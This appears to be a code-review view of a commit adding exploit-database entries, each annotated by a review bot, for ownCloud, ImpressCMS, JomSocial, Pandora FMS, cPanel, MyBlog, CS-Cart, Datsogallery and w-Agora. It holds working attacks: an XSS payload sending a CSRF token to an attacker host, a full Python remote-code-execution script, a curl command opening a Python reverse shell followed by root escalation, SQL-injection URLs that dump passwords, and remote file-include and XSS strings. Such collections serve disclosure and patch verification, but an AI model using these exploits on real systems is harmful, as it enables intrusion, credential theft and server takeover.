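Review bot: The stored XSS capture includes a live-looking session cookie (`Cookie: PHPSESSID=sjjl1sqlt8ceuo5upt6p9jfsf1`), which should be redacted in a published advisory. The title "Multiply vulnerabilites" should read "Multiple vulnerabilities", the stored payload says "css here" where XSS is meant, and no fixed version is given. The trailing `chherZ.` looks like a sign-off fragment.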

131
platforms/php/webapps/31427.txt Executable file

@ -0,0 +1,131 @@
# Exploit Title: ownCloud 6.0.0a File Deletion XSS and CSRF Protection Bypass
# Vendor Homepage: www.ownCloud.org
# OwnCloud Version: 6.0.0a
# Browsers tested: Iceweasel 22.0; Internet Explorer 11;
# Server: Debian. Default LAMP set-up.
# Exploit Author: James Sibley (absane)
# Blog: http://blog.noobroot.com
# Discovery date: December 12th, 2013
# Vendor notified: December 12th, 2013
# Vendor fixed: January 22th, 2014
# CVE assignment: CVE-2014-1665
A malicious ownCloud user can upload a file with JavaScript code in the filename, share it, and
cause a XSS attack when the victim tries to either view the contents of the file or delete the
file.
If the victim is an ownCloud administrator, an attacker can force the mounting of the webserver's
local file system, leading to unauthorized access to server resources and potentially shell
access.
=======================
=Proof of Concept.....=
=======================
1) Create a file named <img src=x onerror=alert(0);>.txt (on a Linux machine)
2) Upload it to OwnCloud by clicking on the Upload button (up arrow next to "new") on the Web UI.
3) Share the file with the victim.
4) When the victim sees the shared file in their "Shared" directory, they can:
a) View the contents of the file within OwnCloud, or
b) become suspicious of the file and attempt to delete it.
Both a) and b) options will result in Javascript being executed in the victim's web browser.
=======================
=Exploit..............=
=======================
** **
** NOTE: Replace [ATTACKER'S WEBSERVER] with the attacker's domain/IP. **
** NOTE: Replace [ATTACKER] with the attacker's account on ownCloud. **
** **
** Filename (share a malicious file with this name):
<img src=x onerror="var z=document.getElementsByTagName('head')[0].getAttribute('data-requesttoken');
document.location='http://[ATTACKER'S WEBSERVER]/ownCloudhack.php?rt='+z";>
** Code (ownCloudhack.php):
<!DOCTYPE HTML>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>OwnCloud 6.0.0a XSS and CSRF Protection Bypass</title>
<script type="text/javascript"
src="http://ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script>
</head>
<body>
<span id="container"></span>
<form id="form1">
<input type="hidden" name="mountPoint" value="LOL">
<input type="hidden" name="class" value="\OC\Files\Storage\Local">
<input type="hidden" name="classOptions[datadir]" value="/">
<input type="hidden" name="mountType" value="user">
<input type="hidden" name="applicable" value="[ATTACKER]">
<input type="hidden" name="isPersonal" value="false">
<?php echo '<input type="hidden" name="requesttoken" value="'.$_GET["rt"].'">' ?>
</form>
<script>
$('#form1').submit(function(event) {
event.preventDefault();
$.ajax({
type: 'POST',
url: 'http://[ATTACKER'S WEBSERVER]/index.php/apps/files_external/ajax/addMountPoint.php',
data: $(this).serialize(),
xhrFields: {
withCredentials: true
},
dataType: 'json',
}
});
});
</script>
<form id="form2">
<input type="hidden" name="appid" value="files_external">
<?php echo '<input type="hidden" name="requesttoken" value="'.$_GET["rt"].'">' ?>
</form>
<script>
$('#form2').submit(function(event) {
event.preventDefault();
$.ajax({
type: 'POST',
url: 'http://[ATTACKER'S WEBSERVER]/index.php/settings/ajax/enableapp.php',
data: $(this).serialize(),
xhrFields: {
withCredentials: true
},
dataType: 'json',
});
});
function ext() {
$('#form2').submit();
$("#container").text("Enabling External Storage...");
};
function mount() {
$('#form1').submit();
$("#container").text("Mounting the root filesystem...");
};
function redirect() {
window.location.href = 'http://[ATTACKER'S WEBSERVER]/';
$("#container").text("Redirecting back home ;)");
};
setTimeout(function() {ext();}, 0);
setTimeout(function() {mount();}, 5000);
setTimeout(function() {redirect();}, 5500);
</script>
</body>
</html>
=======================
=Mitigation...........=
=======================
Upgrade to ownCloud 6.0.1 or greater.
If upgrading is not an option, then the file can be removed by either
1) manually removing the file from the disk via command line interface, or
2) first renaming the file to something else and then deleting the file.
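Review bot: The placeholders are used inconsistently: the notes define `[ATTACKER'S WEBSERVER]` as the attacker's host, yet the AJAX targets `http://[ATTACKER'S WEBSERVER]/index.php/apps/files_external/ajax/addMountPoint.php` and `.../settings/ajax/enableapp.php` are ownCloud endpoints, so a separate placeholder for the victim's ownCloud instance is missing from the notes. In the `#form1` handler the `$.ajax({` call is closed with `}` followed by `});` rather than `});` then `});` (compare the `#form2` handler), so the script does not parse as given. "January 22th" should be "January 22nd". The mitigation section is the most useful part of the entry; it should note that renaming is only a workaround for files already present and that the upgrade is the actual fix.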

88
platforms/php/webapps/31431.txt Executable file

@ -0,0 +1,88 @@
I have discovered two vulnerabilities in ImpressCMS. These have been
fixed in the new 1.3.6 version, which you can get at
https://sourceforge.net/projects/impresscms/files/ImpressCMS%20Official%20Releases/ImpressCMS%201.3%20Branch/ImpressCMS%201.3.6/.
One is an arbitrary file deletion and the other is two cross site
scripting issues.
Note that I was unable to exploit the XSS issues due to the inbuilt
protection module, but someone smarter / with more time might be able
to do it.
The tickets containing the information are available here
https://www.assembla.com/spaces/dW4voyNP0r4ldbeJe5cbLr/tickets?report%5Bestimate_show%5D=true&report%5Bid%5D=0&report%5Bmilestone_id_cond%5D=1&report%5Bmilestone_id_val%5D=4129593&report%5Btitle%5D=All+Tickets+for+%27ImpressCMS+1.3.6%27&report%5Btotal_estimate_show%5D=true&report%5Btotal_invested_hours_show%5D=true&report%5Bworking_hours_show%5D=true.
The full report can be seen at my repo
https://github.com/pedrib/PoC/blob/master/impresscms-1.3.5.txt
Thanks in advance, and thanks to the ImpressCMS team for being so responsive.
Regards,
Pedro Ribeiro
Agile Information Security
--------
Proof of concept:
ImpressCMS 1.3.5 vulnerabilities
===================================
Discovered by
Pedro Ribeiro (pedrib@gmail.com) of Agile Information Security
========================================
Vulnerability: Deletion of arbitrary files in the system
File(line): /impresscms/htdocs/libraries/image-editor/image-edit.php(62)
Code snippet:
if (! is_null ( $op ) && $op == 'cancel') {
$image_path = isset ( $_GET ['image_path'] ) ? $_GET ['image_path'] : null;
if (file_exists ( $image_path )) {
@unlink ( $image_path );
}
Proof of concept:
<form name="input" action="http://192.168.56.101/impresscms/htdocs/libraries/image-editor/image-edit.php?op=cancel&image_path=/path/to/any/file" method="post">
<input type="submit" value="Submit">
</form>
========================================
Vulnerability: Cross site scripting (XSS)
File(line): /impresscms/htdocs/misc.php(110)
Code snippet:
<h4><?php echo _MSC_AVAVATARS;?></h4>
<form name='avatars' action='<?php echo $_SERVER['REQUEST_URI'];?>'>
<table width='100%'>
Proof of concept:
https://192.168.56.101/impresscms/htdocs/misc.php?action=showpopups&type=avatars&target='>PAYLOAD
NOTE: wasn't able to exploit with Protector on, but someone smarter might be able to do it.
========================================
Vulnerability: Cross site scripting (XSS)
File(line): /impresscms/modules/system/admin/tplsets/main.php(171)
Code snippet:
case 'listtpl':
$tplset = trim($_GET['tplset']);
if ($tplset == '') {
redirect_header('admin.php?fct=tplsets', 1);
}
if ($moddir == '') {
redirect_header('admin.php?fct=tplsets', 1);
}
icms_cp_header();
$module_handler = icms::handler('icms_module');
$module =& $module_handler->getByDirname($moddir);
$modname = $module->getVar('name');
echo '<div class="CPbigTitle" style="background-image: url('
. ICMS_MODULES_URL . '/system/admin/tplsets/images/tplsets_big.png)">'
. '<a href="admin.php?fct=tplsets">'. _MD_TPLMAIN
.'</a>&nbsp;<span style="font-weight:bold;">&raquo;&raquo;</span>&nbsp;'
. $tplset . '&nbsp;<span style="font-weight:bold;">&raquo;&raquo;</span>&nbsp;'
. $modname . '<br /><br /></div><br />';
Proof of concept:
https://192.168.56.101/impresscms/htdocs/modules/system/admin.php?fct=tplsets&op=listtpl&tplset=aaaa">PAYLOAD&moddir=banners
NOTE: wasn't able to exploit with Protector on, but someone smarter might be able to do it.
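Review bot: For the file-deletion issue, the snippet shows `$_GET['image_path']` passed straight to `@unlink`; the advisory should state the fix as restricting the path to the image editor's upload directory (a `realpath()` prefix check) rather than only pointing at 1.3.6. For the `misc.php` XSS, `$_SERVER['REQUEST_URI']` is echoed into the form `action` attribute without escaping, and the tplsets entry echoes `$tplset` into HTML the same way; the expected fix in both places is `htmlspecialchars()` on output. The two XSS notes ("wasn't able to exploit with Protector on") are repeated verbatim and could be stated once.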

164
platforms/php/webapps/31435.py Executable file

@ -0,0 +1,164 @@
#!/usr/bin/python
#
# Joomla! JomSocial component >= 2.6 PHP code execution exploit
#
# Authors:
# - Matias Fontanini
# - Gaston Traberg
#
# This exploit allows the execution of PHP code without any prior
# authentication on the Joomla! JomSocial component.
#
# Note that in order to be able to execute PHP code, both the "eval"
# and "assert" functions must be enabled. It is also possible to execute
# arbitrary PHP functions, without using them. Therefore, it is possible
# to execute shell commands using "system", "passthru", etc, as long
# as they are enabled.
#
# Examples:
#
# Execute PHP code:
# ./exploit.py -u http://example.com/index.php -p "echo 'Hello World!';"
# ./exploit.py -u http://example.com/index.php -p /tmp/script_to_execute.php
#
# Execute shell commands(using system()):
# ./exploit.py -u http://example.com/index.php -s "netstat -n"
#
# Exploit shell commands(using a user provided function, passthru in this case)
# ./exploit.py -u http://example.com/joomla/index.php -s "netstat -natp" -c passthru
#
# Exploit execution example:
# $ python exploit.py -u http://example.com/index.php -p 'var_dump("Hello World!");'
# [i] Retrieving cookies and anti-CSRF token... Done
# [+] Executing PHP code...
# string(12) "Hello World!"
import urllib, urllib2, re, argparse, sys, os
class Exploit:
token_request_data = 'option=com_community&view=frontpage'
exploit_request_data = 'option=community&no_html=1&task=azrul_ajax&func=photos,ajaxUploadAvatar&{0}=1&arg2=["_d_","Event"]&arg3=["_d_","374"]&arg4=["_d_","{1}"]'
json_data = '{{"call":["CStringHelper","escape", "{1}","{0}"]}}'
def __init__(self, url, user_agent = None, use_eval = True):
self.url = url
self._set_user_agent(user_agent)
self.use_eval = use_eval
self.token_regex = re.compile('<input type=\"hidden\" name=\"([\w\d]{32})\" value=\"1\" \/>')
self.cookie, self.token = self._retrieve_token()
self.result_regex = re.compile('method=\\\\"POST\\\\" enctype=\\\\"multipart\\\\/form-data\\\\"><br>(.*)<div id=\\\\"avatar-upload\\\\">', re.DOTALL)
self.command_regex = re.compile('(.*)\\[\\["as","ajax_calls","d",""\\]', re.DOTALL)
def _set_user_agent(self, user_agent):
self.user_agent = user_agent
def _make_opener(self, add_cookie = True):
opener = urllib2.build_opener()
if add_cookie:
opener.addheaders.append(('Cookie', self.cookie))
opener.addheaders.append(('Referer', self.url))
if self.user_agent:
opener.addheaders.append(('User-Agent', self.user_agent))
return opener
def _retrieve_token(self):
opener = self._make_opener(False)
sys.stdout.write('[i] Retrieving cookies and anti-CSRF token... ')
sys.stdout.flush()
req = opener.open(self.url, Exploit.token_request_data)
data = req.read()
token = self.token_regex.findall(data)
if len(token) < 1:
print 'Failed'
raise Exception("Could not retrieve anti-CSRF token")
print 'Done'
return (req.headers['Set-Cookie'], token[0])
def _do_call_function(self, function, parameter):
parameter = parameter.replace('"', '\\"')
json_data = Exploit.json_data.format(function, parameter)
json_data = urllib2.quote(json_data)
data = Exploit.exploit_request_data.format(self.token, json_data)
opener = self._make_opener()
req = opener.open(self.url, data)
if function == 'assert':
return req.read()
elif function in ['system', 'passthru']:
result = self.command_regex.findall(req.read())
if len(result) == 1:
return result[0]
else:
return "[+] Error executing command."
else:
result = self.result_regex.findall(req.read())
if len(result) == 1:
return result[0].replace('\\/', '/').replace('\\"', '"').replace('\\n', '\n')
else:
return "[+] Error executing command."
def call_function(self, function, parameter):
if self.use_eval:
return self.eval("echo {0}('{1}')".format(function, parameter))
else:
return self._do_call_function(function, parameter)
def disabled_functions(self):
return self.call_function("ini_get", "disable_functions")
def test_injection(self):
result = self.eval("echo 'HELLO' . ' - ' . 'WORLD';")
if 'HELLO - WORLD' in result:
print "[+] Code injection using eval works"
else:
print "[+] Code injection doesn't work. Try executing shell commands."
def eval(self, code):
if code [-1] != ';':
code = code + ';'
return self._do_call_function('assert', "@exit(@eval(@base64_decode('{0}')));".format(code.encode('base64').replace('\n', '')))
parser = argparse.ArgumentParser(
description="JomSocial >= 2.6 - Code execution exploit"
)
parser.add_argument('-u', '--url', help='the base URL', required=True)
parser.add_argument(
'-p',
'--php-code',
help='the PHP code to execute. Use \'-\' to read from stdin, or provide a file path to read from')
parser.add_argument('-s', '--shell-command', help='the shell command to execute')
parser.add_argument('-c', '--shell-function', help='the PHP function to use when executing shell commands', default="system")
parser.add_argument('-t', '--test', action='store_true', help='test the PHP code injection using eval', default=False)
parser.add_argument('-n', '--no-eval', action='store_false', help='don\'t use eval when executing shell commands', default=True)
args = parser.parse_args()
if not args.test and not args.php_code and not args.shell_command:
print '[-] Need -p, -t or -s to do something...'
exit(1)
url = args.url
try:
if not url.startswith('http://') and not url.startswith('https://'):
url = 'http://' + url
exploit = Exploit(url, use_eval=args.no_eval)
if args.test:
exploit.test_injection()
elif args.php_code:
code = args.php_code
if args.php_code == '-':
print '[i] Enter the code to be executed:'
code = sys.stdin.read()
elif os.path.isfile(code):
try:
fd = open(code)
code = fd.read()
fd.close()
except Exception:
print "[-] Error reading the file."
exit(1)
print '[+] Executing PHP code...'
print exploit.eval(code)
elif args.shell_command:
print exploit.call_function(args.shell_function, args.shell_command)
except Exception as ex:
print '[+] Error: ' + str(ex)
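Review bot: the session is carried by replaying the raw `Set-Cookie` value as the `Cookie` header (`return (req.headers['Set-Cookie'], token[0])` and `opener.addheaders.append(('Cookie', self.cookie))`), which forwards attributes such as path and expires and breaks when the server sets more than one cookie, because `httplib` joins repeated headers with ", "; a `cookielib.CookieJar` with `urllib2.HTTPCookieProcessor` would handle this correctly. The script is also Python 2 only (`print` statements, `str.encode('base64')`, `urllib2`), which the header comment should say next to the `#!/usr/bin/python` shebang, and `-n/--no-eval` is stored as `args.no_eval` yet passed as `use_eval=args.no_eval`, so the attribute reads as the opposite of what it holds; `dest='use_eval'` would remove the ambiguity.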

platforms/php/webapps/31436.txt Executable file
@ -0,0 +1,103 @@
-----------
Author:
-----------
xistence < xistence[at]0x90[.]nl >
-------------------------
Affected products:
-------------------------
Pandora FMS 5.0RC1 and below
-------------------------
Affected vendors:
-------------------------
Pandora FMS
http://pandorafms.com/
-------------------------
Product description:
-------------------------
Enterprise IT Monitoring for Networks, Applications, Servers and Virtual
Infrastructure
----------
Details:
----------
[ 0x01 - Remote Code Execution ]
The Pandora 4.0.3 / 4.1 / 5.0 RC1 appliances are prone to security
vulnerabilities.
The Anytermd daemon used for the SSH/Telnet gateway on TCP port 8022/8023
is vulnerable to command injection in the "p" POST parameter,
which allows any unauthenticated attacker to execute arbitrary commands
with the rights of the "pandora" user.
The 4.1 and 5.0 RC1 appliances also fail to set a password for the "artica"
user during installation to the harddrive. It's not possible
to gain SSH access using this user if there's no password set. However it's
possible to use the above vulnerability to "su" to the "artica" user and
from there "sudo"
to the "root" user as "sudo" won't ask for a password either.
This issue doesn't exist in the 4.0.3 appliance.
Below are the steps to reproduce this. Gaining a shell as "pandora" is
possible on all Pandora versions,
the other privilege escalation steps are only on 4.1 / 5.0.
# Open a linux/osx terminal and run a netcat listener like this:
nc -vl 8888
# Execute the following curl command, replace "123.123.123.123" with the IP
of the Pandora server and "321.321.321.321" with the machine running netcat.
curl -i -s -k -X 'POST' \
-H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
--data-binary $'a=open&p=%60python -c \'import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"321.321.321.321\",8888));os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\",\"-i\"]);\'%60' \
'http://123.123.123.123:8022/anyterm-module'
# In the netcat shell you'll receive a shell as user "pandora". Use the
following command to spawn a pty: python -c 'import
pty;pty.spawn("/bin/bash")'
# Change user to artica by doing a "su - artica". From here do a "sudo -s"
to gain a root shell. Below is how it should look like.
$ nc -vl 8888
python -c 'import pty;pty.spawn("/bin/bash")'
bash-4.1$ su - artica
su - artica
-bash-4.1$ id
id
uid=501(artica) gid=501(artica) groups=501(artica)
-bash-4.1$ sudo -s
sudo -s
[root@localhost artica]# id
id
uid=0(root) gid=0(root) groups=0(root)
[root@localhost artica]#
-----------
Solution:
-----------
Upgrade to Pandora FMS 5.0 final or later
--------------
Timeline:
--------------
04-10-2013 - Issues discovered and vendor notified
04-10-2013 - Reply from vendor stating they will fix it asap
10-10-2013 - Reply from vendor that they fixed the issue
04-11-2013 - Release of Pandora FMS 5.0 final
29-01-2014 - Public disclosure
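Review bot: the Solution section only says to upgrade to 5.0 final; the details above imply interim mitigations that should be listed for deployments that cannot upgrade yet: restrict network access to the Anytermd gateway on TCP 8022/8023, set a password for the "artica" account on the 4.1 / 5.0 RC1 appliances, and require a password in that account's sudo configuration. The `curl` proof of concept is also broken across wrapped lines (`--data-binary $'a=open&p=%60python -c \'import` through `'%60' \`), so the wrapping inside the python one-liner should be marked as such, or the command rejoined, before it is copied literally.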

@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/28300/info
cPanel is prone to an information-disclosure vulnerability.
An attacker can exploit this issue to determine programs that are running on the affected server and to view folders on other sites that are protected by a firewall. Information obtained may lead to further attacks.
http://www.example.com:2082/frontend/x/diskusage/index.html?showtree=/home/user/.htpasswds
http://www.example.com:2082/frontend/x/diskusage/index.html?showtree=/var
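Review bot: no affected cPanel version is given, unlike the other SecurityFocus-sourced entries in this commit (`CS-Cart 1.3.2 is vulnerable`, `w-Agora 4.0 is vulnerable`); the version range from BID 28300, or a note that it is unknown, should be added so the entry can be matched against deployments. The entry should also say what the `showtree` parameter is meant to accept, since the two URLs (`/home/user/.htpasswds`, `/var`) show it walking outside the account's own tree, which is the actual defect to verify after a fix.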

platforms/php/webapps/31441.txt Executable file
@ -0,0 +1,16 @@
source: http://www.securityfocus.com/bid/28313/info
MyBlog is prone to multiple input-validation vulnerabilities, including:
- Multiple SQL-injection vulnerabilities
- Multiple remote file-include vulnerabilities
- A privilege-escalation vulnerability
An attacker may exploit these issues to compromise the affected application, execute arbitrary script code in the context of the webserver process, or pass malicious input to database queries, resulting in the modification of query logic or other attacks.
http://www.example.com/path/member.php?id='+union+select+password,2,3,4,5,6,7,8,9,10+from+myblog_users+/*
http://www.example.com/path/post.php?id='+union+select+2,3,user,password,6,7,8,9,10,11,12+from+myblog_users/*
http://www.example.com/path/vote.php?id='+union+select+password,3,4,5,6,7,8,9,10,11,12+from+myblog_users+/*
http://www.example.com/path/vote.php?mid='+union+select+password,3,4,5,6,7,8,9,10+from+myblog_users+/*
http://www.example.com/path/games.php?id=[shell]%00
http://www.example.com/path/games.php?scoreid=[shell]%00
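Review bot: the list of issues includes a privilege-escalation vulnerability, but the proof-of-concept URLs only cover the SQL-injection cases (`member.php`, `post.php`, `vote.php`) and the remote file-include cases (`games.php`), and no affected MyBlog version is named; either add the missing details from BID 28313 or state that they are unknown. The `[shell]` placeholder in the `games.php` URLs should also be described as a placeholder for an include URL, since nothing in the entry explains it.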

platforms/php/webapps/31443.txt Executable file
@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/28333/info
CS-Cart is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
CS-Cart 1.3.2 is vulnerable; other versions may also be affected.
GET /cscart/index.php?target=products&mode=search&subcats=Y&type=extended&avail=Y&pshor=Y&pfull=Y&pname=Y&cid=3&q=%22%20style%3D%22background:url(javascript:alert(12345))%22%20OA%3D%22&.x=0&.y=0 HTTP/1.0
Cookie: cart_languageC=EN; csid=
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: 192.168.1.1
Referer: http://192.168.1.1/cscart/
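Review bot: the prose never names the injection point; from the request it is the `q` search parameter of `index.php?target=products&mode=search`, carrying `%22%20style%3D%22background:url(javascript:alert(12345))%22`, and that should be stated explicitly so the entry is usable for patch verification and for detection rules. The vector relies on a `javascript:` URL inside a CSS `background` property, which only legacy browsers such as the `MSIE 6.0` User-Agent in the request execute, so the entry should make clear that the unescaped reflection of `q` is the bug, not that particular payload.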

@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/28353/info
News-Template is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/content/print/print.php?ide="><script>alert("CANAKKALE-GECiLMEZ")</script>
http://www.example.com/content/print/print.php?file_name="><script>alert("CANAKKALE-GECiLMEZ")</script>
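Review bot: no affected News-Template version is given and the prose does not name the parameters; the two URLs show `ide` and `file_name` of `content/print/print.php`, which should be listed explicitly, together with the version information from BID 28353 or a note that it is unknown.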

@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/28361/info
The Datsogallery component for Joomla! and Mambo is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/index.php?option=com_datsogallery&func=detail&id='union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8,9,0,1,2,3,4,5+from+jos_users/*
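Review bot: no affected Datsogallery version is given and the vulnerable parameter is only visible in the URL (`id` of `func=detail`); both should be stated in the prose. The `jos_users` table name in the proof of concept assumes the default Joomla! table prefix, which is worth noting since it is the only environment-specific part of the query.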

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28366/info
w-Agora is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
w-Agora 4.0 is vulnerable; other versions may also be affected.
http://www.example.com/w-agora_path/add_user.php?bn_dir_default=ZoRLu.txt?
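Review bot: this is the first of nine files in this commit for BID 28366 that differ only in the script name (`add_user.php` through `reorder_forums.php`) and all inject the same `bn_dir_default` parameter with an identical description; a single entry listing the affected scripts, or at least a cross-reference in each, would avoid the duplication and make clear that one include pattern is at fault. The remediation is also missing: `bn_dir_default` is evidently the directory used in the include, so it should be hard-coded or whitelisted server-side, with `allow_url_include` and `allow_url_fopen` disabled as defence in depth.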

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28366/info
w-Agora is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
w-Agora 4.0 is vulnerable; other versions may also be affected.
http://www.example.com/w-agora_path/create_forum.php?bn_dir_default=ZoRLu.txt?

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28366/info
w-Agora is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
w-Agora 4.0 is vulnerable; other versions may also be affected.
http://www.example.com/w-agora_path/create_user.php?bn_dir_default=ZoRLu.txt?

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28366/info
w-Agora is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
w-Agora 4.0 is vulnerable; other versions may also be affected.
http://www.example.com/w-agora_path/delete_notes.php?bn_dir_default=ZoRLu.txt?

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28366/info
w-Agora is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
w-Agora 4.0 is vulnerable; other versions may also be affected.
http://www.example.com/w-agora_path/delete_user.php?bn_dir_default=ZoRLu.txt?

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28366/info
w-Agora is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
w-Agora 4.0 is vulnerable; other versions may also be affected.
http://www.example.com/w-agora_path/edit_forum.php?bn_dir_default=ZoRLu.txt?

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28366/info
w-Agora is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
w-Agora 4.0 is vulnerable; other versions may also be affected.
http://www.example.com/w-agora_path/mail_users.php?bn_dir_default=ZoRLu.txt?

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28366/info
w-Agora is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
w-Agora 4.0 is vulnerable; other versions may also be affected.
http://www.example.com/w-agora_path/moderate_notes.php?bn_dir_default=ZoRLu.txt?

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28366/info
w-Agora is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
w-Agora 4.0 is vulnerable; other versions may also be affected.
http://www.example.com/w-agora_path/reorder_forums.php?bn_dir_default=ZoRLu.txt?